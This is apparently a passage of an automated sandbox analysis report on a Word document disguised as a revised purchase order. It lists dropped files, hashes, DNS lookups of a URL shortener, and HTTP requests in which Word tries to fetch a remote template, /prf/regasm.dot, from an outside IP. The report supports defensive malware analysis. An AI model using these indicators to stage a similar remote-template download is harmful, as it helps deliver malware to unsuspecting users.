                                                                                                                                                        Preview: L..................F.... ...\k.8....f.6.B.....1.B..S(...........................P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...R......................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....>Q.u..user..>.......NM..R.......S....................4.p.a.l.f.o.n.s.....~.1.....>Q.u..Desktop.h.......NM..R.......Y..............>.....+...D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....z.2.S(...R.. .REVISE~1.DOC..^......>Q.u.R......t......................J..R.e.v.i.s.e.d._.P.O._.7.5.8.8.6.9...d.o.c.x.......]...............-.......\...........>.S......C:\Users\user\Desktop\Revised_PO_758869.docx..-.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.R.e.v.i.s.e.d._.P.O._.7.5.8.8.6.9...d.o.c.x.........:..,.LB.)...Aw...`.......X.......302494...........!a..%.H.VZAj....Yt.+........W...!a..%.H.VZAj....Yt.+........W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0
                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):91
                                                                                                                                                        Entropy (8bit):4.614484756207705
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:H8ATQMgZjovDMgZjomxW8ATQMgZjov:HRMkp4My
                                                                                                                                                        MD5:60978D330EEB54C8DD7FB56AABE90690
                                                                                                                                                        SHA1:F5C5FBC7B5B45C7083DB4038E6FF25B9C7091CDD
                                                                                                                                                        SHA-256:05C123FCE05394B855FE5B58C4A37E2E71EC89AF200F7D8E207B1575B0B2665B
                                                                                                                                                        SHA-512:F3063C2C623DECE9917F169D58D50A4CA3E0F7E4737D956A8887E732CA3AB87580280CADB069DFA3D160DDBEBE455815D22B9DC9A1B973046F2BF70ECCA84E0A
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview: [misc]..Revised_PO_758869.LNK=0..Revised_PO_758869.LNK=0..[misc]..Revised_PO_758869.LNK=0..
                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):162
                                                                                                                                                        Entropy (8bit):2.2706270144817187
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Rl/Zdxv8CFlqKkalzlqKoX//Z:RtZzkTHd
                                                                                                                                                        MD5:395B6810FC473C6775B07F26491EFEDF
                                                                                                                                                        SHA1:D48F6A2F11FD4E93F8BE318D87FF6436951BC31F
                                                                                                                                                        SHA-256:C04860ED49ECAAD4B80701C0E99D9B7F4C9A46E860F868D6BFAE9D11EB4C49D7
                                                                                                                                                        SHA-512:CBA4789FB1F3B327C1B23F888B57CE160B90E39003EC45D13E43C7FB0AF6109A86891BC4B155D5D8455B2541661EF304073CD0C709CAF478FCEB8E9B312A1683
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview: .pratesh................................................p.r.a.t.e.s.h.........EgI..1..........$.......6C......AgM..2..........T.......6C......MgQ..3..............
                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                        Category:modified
                                                                                                                                                        Size (bytes):22
                                                                                                                                                        Entropy (8bit):2.9808259362290785
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                        MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                        SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                        SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                        SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                        C:\Users\user\Desktop\~$vised_PO_758869.docx
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):162
                                                                                                                                                        Entropy (8bit):2.2706270144817187
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Rl/Zdxv8CFlqKkalzlqKoX//Z:RtZzkTHd
                                                                                                                                                        MD5:395B6810FC473C6775B07F26491EFEDF
                                                                                                                                                        SHA1:D48F6A2F11FD4E93F8BE318D87FF6436951BC31F
                                                                                                                                                        SHA-256:C04860ED49ECAAD4B80701C0E99D9B7F4C9A46E860F868D6BFAE9D11EB4C49D7
                                                                                                                                                        SHA-512:CBA4789FB1F3B327C1B23F888B57CE160B90E39003EC45D13E43C7FB0AF6109A86891BC4B155D5D8455B2541661EF304073CD0C709CAF478FCEB8E9B312A1683
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview: .pratesh................................................p.r.a.t.e.s.h.........EgI..1..........$.......6C......AgM..2..........T.......6C......MgQ..3..............

                                                                                                                                                        Static File Info

                                                                                                                                                        General

                                                                                                                                                        File type:Microsoft Word 2007+
                                                                                                                                                        Entropy (8bit):6.90464253315849
                                                                                                                                                        TrID:
                                                                                                                                                        • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                                                                                                        • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                                                                                                                        • ZIP compressed archive (8000/1) 7.92%
                                                                                                                                                        File name:Revised_PO_758869.docx
                                                                                                                                                        File size:10323
                                                                                                                                                        MD5:bd5e0d325783b0526ae79b58fe08ee77
                                                                                                                                                        SHA1:c066447df75901430365317b71d21369edf340f6
                                                                                                                                                        SHA256:69ba01eb1fe057757516dbc89211b3990fefe9b894f0594af2ccebe500442202
                                                                                                                                                        SHA512:78416bed2acad5ebc5672b1553e7602c0b6ccaef3331fa24e972e225fbd53aa8753b02abf5f80bf9824c9dac30ce9bcbf623fc3695301edbd22278d5f7d66a6b
                                                                                                                                                        SSDEEP:192:ScIMmtPil9G/bixd5OgpCBAfXViw7swwd3t1:SPXJixd5OBBoVinZb
                                                                                                                                                        File Content Preview:PK..........!....7f... .......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                        File Icon

                                                                                                                                                        Icon Hash:74fcd0d2d6d6d0cc

                                                                                                                                                        Network Behavior

                                                                                                                                                        Network Port Distribution

                                                                                                                                                        TCP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        May 6, 2021 14:46:00.499712944 CEST49713443192.168.2.5185.255.55.12
                                                                                                                                                        May 6, 2021 14:46:00.547868967 CEST44349713185.255.55.12192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:00.548037052 CEST49713443192.168.2.5185.255.55.12
                                                                                                                                                        May 6, 2021 14:46:00.548686028 CEST49713443192.168.2.5185.255.55.12
                                                                                                                                                        May 6, 2021 14:46:00.596779108 CEST44349713185.255.55.12192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:00.597176075 CEST44349713185.255.55.12192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:00.597209930 CEST44349713185.255.55.12192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:00.597232103 CEST44349713185.255.55.12192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:00.597249031 CEST44349713185.255.55.12192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:00.597290993 CEST49713443192.168.2.5185.255.55.12
                                                                                                                                                        May 6, 2021 14:46:00.597312927 CEST49713443192.168.2.5185.255.55.12
                                                                                                                                                        May 6, 2021 14:46:00.600136995 CEST44349713185.255.55.12192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:00.600171089 CEST44349713185.255.55.12192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:00.600266933 CEST49713443192.168.2.5185.255.55.12
                                                                                                                                                        May 6, 2021 14:46:00.607433081 CEST49713443192.168.2.5185.255.55.12
                                                                                                                                                        May 6, 2021 14:46:00.656011105 CEST44349713185.255.55.12192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:00.659933090 CEST49713443192.168.2.5185.255.55.12
                                                                                                                                                        May 6, 2021 14:46:00.733541012 CEST44349713185.255.55.12192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:00.785777092 CEST49713443192.168.2.5185.255.55.12
                                                                                                                                                        May 6, 2021 14:46:00.949285030 CEST49713443192.168.2.5185.255.55.12
                                                                                                                                                        May 6, 2021 14:46:00.997765064 CEST44349713185.255.55.12192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:01.041491032 CEST4971580192.168.2.5107.173.219.80
                                                                                                                                                        May 6, 2021 14:46:01.082618952 CEST49713443192.168.2.5185.255.55.12
                                                                                                                                                        May 6, 2021 14:46:01.176955938 CEST8049715107.173.219.80192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:01.177061081 CEST4971580192.168.2.5107.173.219.80
                                                                                                                                                        May 6, 2021 14:46:01.177673101 CEST4971580192.168.2.5107.173.219.80
                                                                                                                                                        May 6, 2021 14:46:01.314063072 CEST8049715107.173.219.80192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:01.473426104 CEST4971580192.168.2.5107.173.219.80
                                                                                                                                                        May 6, 2021 14:46:04.343472004 CEST49713443192.168.2.5185.255.55.12
                                                                                                                                                        May 6, 2021 14:46:04.416209936 CEST44349713185.255.55.12192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:04.473565102 CEST49713443192.168.2.5185.255.55.12
                                                                                                                                                        May 6, 2021 14:46:04.543879986 CEST49718443192.168.2.5185.255.55.12
                                                                                                                                                        May 6, 2021 14:46:04.593640089 CEST44349718185.255.55.12192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:04.593744993 CEST49718443192.168.2.5185.255.55.12
                                                                                                                                                        May 6, 2021 14:46:04.594801903 CEST49718443192.168.2.5185.255.55.12
                                                                                                                                                        May 6, 2021 14:46:04.642906904 CEST44349718185.255.55.12192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:04.643291950 CEST44349718185.255.55.12192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:04.643345118 CEST44349718185.255.55.12192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:04.643373966 CEST44349718185.255.55.12192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:04.643392086 CEST44349718185.255.55.12192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:04.643407106 CEST49718443192.168.2.5185.255.55.12
                                                                                                                                                        May 6, 2021 14:46:04.643456936 CEST49718443192.168.2.5185.255.55.12
                                                                                                                                                        May 6, 2021 14:46:04.647124052 CEST44349718185.255.55.12192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:04.647234917 CEST49718443192.168.2.5185.255.55.12
                                                                                                                                                        May 6, 2021 14:46:04.659987926 CEST49718443192.168.2.5185.255.55.12
                                                                                                                                                        May 6, 2021 14:46:04.708931923 CEST44349718185.255.55.12192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:04.709059000 CEST49718443192.168.2.5185.255.55.12
                                                                                                                                                        May 6, 2021 14:46:04.710139036 CEST49718443192.168.2.5185.255.55.12
                                                                                                                                                        May 6, 2021 14:46:04.759299040 CEST44349718185.255.55.12192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:04.759497881 CEST49718443192.168.2.5185.255.55.12
                                                                                                                                                        May 6, 2021 14:46:04.769153118 CEST4971980192.168.2.5107.173.219.80
                                                                                                                                                        May 6, 2021 14:46:04.906379938 CEST8049719107.173.219.80192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:04.906529903 CEST4971980192.168.2.5107.173.219.80
                                                                                                                                                        May 6, 2021 14:46:04.907134056 CEST4971980192.168.2.5107.173.219.80
                                                                                                                                                        May 6, 2021 14:46:05.043521881 CEST8049719107.173.219.80192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:05.043689966 CEST4971980192.168.2.5107.173.219.80
                                                                                                                                                        May 6, 2021 14:46:06.823209047 CEST8049715107.173.219.80192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:06.823362112 CEST4971580192.168.2.5107.173.219.80
                                                                                                                                                        May 6, 2021 14:46:06.823548079 CEST4971580192.168.2.5107.173.219.80
                                                                                                                                                        May 6, 2021 14:46:06.959165096 CEST8049715107.173.219.80192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:10.557570934 CEST8049719107.173.219.80192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:10.558087111 CEST4971980192.168.2.5107.173.219.80
                                                                                                                                                        May 6, 2021 14:47:09.416759014 CEST44349713185.255.55.12192.168.2.5
                                                                                                                                                        May 6, 2021 14:47:09.416780949 CEST44349713185.255.55.12192.168.2.5
                                                                                                                                                        May 6, 2021 14:47:09.416912079 CEST49713443192.168.2.5185.255.55.12
                                                                                                                                                        May 6, 2021 14:47:09.418459892 CEST49713443192.168.2.5185.255.55.12
                                                                                                                                                        May 6, 2021 14:47:09.418505907 CEST49713443192.168.2.5185.255.55.12
                                                                                                                                                        May 6, 2021 14:47:09.470913887 CEST44349713185.255.55.12192.168.2.5
                                                                                                                                                        May 6, 2021 14:47:09.472534895 CEST44349713185.255.55.12192.168.2.5
                                                                                                                                                        May 6, 2021 14:47:09.762667894 CEST44349718185.255.55.12192.168.2.5
                                                                                                                                                        May 6, 2021 14:47:09.762715101 CEST44349718185.255.55.12192.168.2.5
                                                                                                                                                        May 6, 2021 14:47:09.762763977 CEST49718443192.168.2.5185.255.55.12
                                                                                                                                                        May 6, 2021 14:47:09.762794971 CEST49718443192.168.2.5185.255.55.12
                                                                                                                                                        May 6, 2021 14:47:48.248266935 CEST4971980192.168.2.5107.173.219.80
                                                                                                                                                        May 6, 2021 14:47:48.248742104 CEST49718443192.168.2.5185.255.55.12
                                                                                                                                                        May 6, 2021 14:47:48.248775959 CEST49718443192.168.2.5185.255.55.12
                                                                                                                                                        May 6, 2021 14:47:48.298964977 CEST44349718185.255.55.12192.168.2.5
                                                                                                                                                        May 6, 2021 14:47:48.299092054 CEST49718443192.168.2.5185.255.55.12
                                                                                                                                                        May 6, 2021 14:47:48.656090021 CEST4971980192.168.2.5107.173.219.80
                                                                                                                                                        May 6, 2021 14:47:49.358824968 CEST4971980192.168.2.5107.173.219.80
                                                                                                                                                        May 6, 2021 14:47:50.763726950 CEST4971980192.168.2.5107.173.219.80
                                                                                                                                                        May 6, 2021 14:47:53.576394081 CEST4971980192.168.2.5107.173.219.80
                                                                                                                                                        May 6, 2021 14:47:59.186430931 CEST4971980192.168.2.5107.173.219.80
                                                                                                                                                        May 6, 2021 14:48:10.390429974 CEST4971980192.168.2.5107.173.219.80

                                                                                                                                                        UDP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        May 6, 2021 14:45:49.706518888 CEST6434453192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:45:49.720417023 CEST53653078.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:45:49.758126974 CEST53643448.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:45:49.843189001 CEST6206053192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:45:49.891927004 CEST53620608.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:45:50.059768915 CEST6180553192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:45:50.109241962 CEST53618058.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:45:51.027409077 CEST5479553192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:45:51.076941013 CEST53547958.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:45:51.930135965 CEST4955753192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:45:51.978976965 CEST53495578.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:45:52.824058056 CEST6173353192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:45:52.873686075 CEST53617338.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:45:52.906527996 CEST6544753192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:45:52.966234922 CEST53654478.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:45:54.302583933 CEST5244153192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:45:54.351511955 CEST53524418.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:45:56.354629993 CEST6217653192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:45:56.403482914 CEST53621768.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:45:57.560650110 CEST5959653192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:45:57.609478951 CEST53595968.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:45:58.409532070 CEST6529653192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:45:58.495517015 CEST53652968.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:45:59.221087933 CEST6318353192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:45:59.293140888 CEST53631838.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:45:59.477041960 CEST6015153192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:45:59.542303085 CEST53601518.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:00.208307028 CEST6318353192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:46:00.287106037 CEST53631838.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:00.447164059 CEST5696953192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:46:00.497996092 CEST53569698.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:00.660527945 CEST5516153192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:46:00.713589907 CEST53551618.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:01.083611965 CEST5475753192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:46:01.142955065 CEST53547578.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:01.223625898 CEST6318353192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:46:01.281244040 CEST53631838.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:02.083410978 CEST5475753192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:46:02.145606041 CEST53547578.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:02.177628040 CEST4999253192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:46:02.229242086 CEST53499928.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:03.083184958 CEST5475753192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:46:03.101454020 CEST6007553192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:46:03.142405033 CEST53547578.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:03.153067112 CEST53600758.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:03.239325047 CEST6318353192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:46:03.296456099 CEST53631838.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:04.479367018 CEST5501653192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:46:04.538964987 CEST53550168.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:05.098936081 CEST5475753192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:46:05.160948992 CEST53547578.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:07.255265951 CEST6318353192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:46:07.312431097 CEST53631838.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:09.116043091 CEST5475753192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:46:09.164860010 CEST53547578.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:12.277283907 CEST6434553192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:46:12.338917971 CEST53643458.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:46:23.377789021 CEST5712853192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:46:23.435271025 CEST53571288.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:47:01.744211912 CEST5479153192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:47:01.821146965 CEST53547918.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:47:07.645854950 CEST5046353192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:47:07.708878040 CEST53504638.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:47:25.635497093 CEST5039453192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:47:25.701872110 CEST53503948.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:47:45.644799948 CEST5853053192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:47:45.703958035 CEST53585308.8.8.8192.168.2.5
                                                                                                                                                        May 6, 2021 14:47:47.712800026 CEST5381353192.168.2.58.8.8.8
                                                                                                                                                        May 6, 2021 14:47:47.787161112 CEST53538138.8.8.8192.168.2.5

                                                                                                                                                        DNS Queries

                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                        May 6, 2021 14:46:00.447164059 CEST192.168.2.58.8.8.80x3dc3Standard query (0)u.nuA (IP address)IN (0x0001)
                                                                                                                                                        May 6, 2021 14:46:04.479367018 CEST192.168.2.58.8.8.80x9bcaStandard query (0)u.nuA (IP address)IN (0x0001)

                                                                                                                                                        DNS Answers

                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                        May 6, 2021 14:46:00.497996092 CEST8.8.8.8192.168.2.50x3dc3No error (0)u.nu185.255.55.12A (IP address)IN (0x0001)
                                                                                                                                                        May 6, 2021 14:46:04.538964987 CEST8.8.8.8192.168.2.50x9bcaNo error (0)u.nu185.255.55.12A (IP address)IN (0x0001)

                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                        • 107.173.219.80

                                                                                                                                                        HTTP Packets

                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        0192.168.2.549715107.173.219.8080C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        May 6, 2021 14:46:01.177673101 CEST453OUTHEAD /prf/regasm.dot HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Authorization: Bearer
                                                                                                                                                        User-Agent: Microsoft Office Word 2014
                                                                                                                                                        X-Office-Major-Version: 16
                                                                                                                                                        X-MS-CookieUri-Requested: t
                                                                                                                                                        X-FeatureVersion: 1
                                                                                                                                                        X-IDCRL_ACCEPTED: t
                                                                                                                                                        Host: 107.173.219.80
                                                                                                                                                        May 6, 2021 14:46:01.314063072 CEST471INHTTP/1.1 404 Not Found
                                                                                                                                                        Date: Thu, 06 May 2021 12:46:01 GMT
                                                                                                                                                        Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.4.16
                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        1192.168.2.549719107.173.219.8080C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        May 6, 2021 14:46:04.907134056 CEST784OUTGET /prf/regasm.dot HTTP/1.1
                                                                                                                                                        Accept: */*
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Host: 107.173.219.80
                                                                                                                                                        May 6, 2021 14:46:05.043521881 CEST784INHTTP/1.1 404 Not Found
                                                                                                                                                        Date: Thu, 06 May 2021 12:46:04 GMT
                                                                                                                                                        Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.4.16
                                                                                                                                                        Content-Length: 301
                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 36 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6a 20 50 48 50 2f 37 2e 34 2e 31 36 20 53 65 72 76 65 72 20 61 74 20 31 30 37 2e 31 37 33 2e 32 31 39 2e 38 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.4.16 Server at 107.173.219.80 Port 80</address></body></html>


                                                                                                                                                        HTTPS Packets

                                                                                                                                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                        May 6, 2021 14:46:00.600136995 CEST185.255.55.12443192.168.2.549713CN=u.nu CN=GoGetSSL RSA DV CA, O=GoGetSSL, L=Riga, C=LV CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=GoGetSSL RSA DV CA, O=GoGetSSL, L=Riga, C=LV CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USThu Jan 30 01:00:00 CET 2020 Thu Sep 06 02:00:00 CEST 2018 Mon Feb 01 01:00:00 CET 2010Sun Jan 30 00:59:59 CET 2022 Wed Sep 06 01:59:59 CEST 2028 Tue Jan 19 00:59:59 CET 2038771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                        CN=GoGetSSL RSA DV CA, O=GoGetSSL, L=Riga, C=LVCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USThu Sep 06 02:00:00 CEST 2018Wed Sep 06 01:59:59 CEST 2028
                                                                                                                                                        CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USMon Feb 01 01:00:00 CET 2010Tue Jan 19 00:59:59 CET 2038
